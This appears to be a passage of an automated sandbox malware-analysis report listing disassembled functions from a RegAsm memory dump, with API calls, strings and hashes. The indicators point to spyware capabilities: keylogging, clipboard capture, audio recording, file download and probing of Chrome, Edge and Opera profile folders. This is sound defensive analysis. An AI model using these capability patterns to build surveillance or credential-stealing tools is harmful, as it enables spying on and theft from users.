                                                                                                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1761009282-0
                                                                                                                                                                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                      • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                                                                                                                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                                                                                      • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                                                                                                                      APIs
                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                      • String ID: pow
                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                      • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                      • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                                                                                                                      • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                                                                                                                      • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 1000655C
                                                                                                                                                                        • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                                                                                                                                                                        • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                                                                                                        • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                      • API String ID: 2667617558-3972193922
                                                                                                                                                                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                      • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                                                                                                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                                                        • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                      • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                                                        • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                        • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                      • String ID: image/jpeg
                                                                                                                                                                      • API String ID: 1291196975-3785015651
                                                                                                                                                                      • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                      • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                      • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer__onexit
                                                                                                                                                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                      • API String ID: 1881088180-3686566968
                                                                                                                                                                      • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                      • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                                                      • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                      • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                      • API String ID: 0-711371036
                                                                                                                                                                      • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                      • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                                      • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                      • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                                                                        • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                                                                        • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                        • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                      • String ID: image/png
                                                                                                                                                                      • API String ID: 1291196975-2966254431
                                                                                                                                                                      • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                      • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                      • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                                      Strings
                                                                                                                                                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                      • API String ID: 481472006-1507639952
                                                                                                                                                                      • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                                                      • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32 ref: 0041667B
                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DownloadFileSleep
                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                      • API String ID: 1931167962-604454484
                                                                                                                                                                      • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                                                      • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                                                      • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _strlen
                                                                                                                                                                      • String ID: : $Se.
                                                                                                                                                                      • API String ID: 4218353326-4089948878
                                                                                                                                                                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                      • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                      • API String ID: 481472006-2430845779
                                                                                                                                                                      • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                      • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                                      APIs
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID: alarm.wav$hYG
                                                                                                                                                                      • API String ID: 1174141254-2782910960
                                                                                                                                                                      • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                      • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                                                      • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                      • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                        • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                      • String ID: Online Keylogger Stopped
                                                                                                                                                                      • API String ID: 1623830855-1496645233
                                                                                                                                                                      • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                      • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                                                      • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                                                                                                                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                      • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                      • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                                                                                                                      • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                                                                                                                      APIs
                                                                                                                                                                      • waveInPrepareHeader.WINMM(00B791F8,00000020,?), ref: 00401849
                                                                                                                                                                      • waveInAddBuffer.WINMM(00B791F8,00000020), ref: 0040185F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wave$BufferHeaderPrepare
                                                                                                                                                                      • String ID: XMG
                                                                                                                                                                      • API String ID: 2315374483-813777761
                                                                                                                                                                      • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                                                      • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                                                                                                                      • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                                                                                                                      • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LocaleValid
                                                                                                                                                                      • String ID: IsValidLocaleName$kKD
                                                                                                                                                                      • API String ID: 1901932003-3269126172
                                                                                                                                                                      • Opcode ID: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                      • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                                                                                      • Opcode Fuzzy Hash: 411afafda0bfc4592f61c6642b3d3a7ff2b19ca3a749cc907bc85bd1ec8c8ae6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                                                                                      APIs
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                      • API String ID: 1174141254-4188645398
                                                                                                                                                                      • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                                                                                      • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                                                                                      • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                                                                                      • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                                                                                      APIs
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                      • API String ID: 1174141254-2800177040
                                                                                                                                                                      • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                                                                                      • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                                                                                      • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                                                                                      • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                                                                                      APIs
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5F7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                      • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                      • API String ID: 1174141254-1629609700
                                                                                                                                                                      • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                                                                                      • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
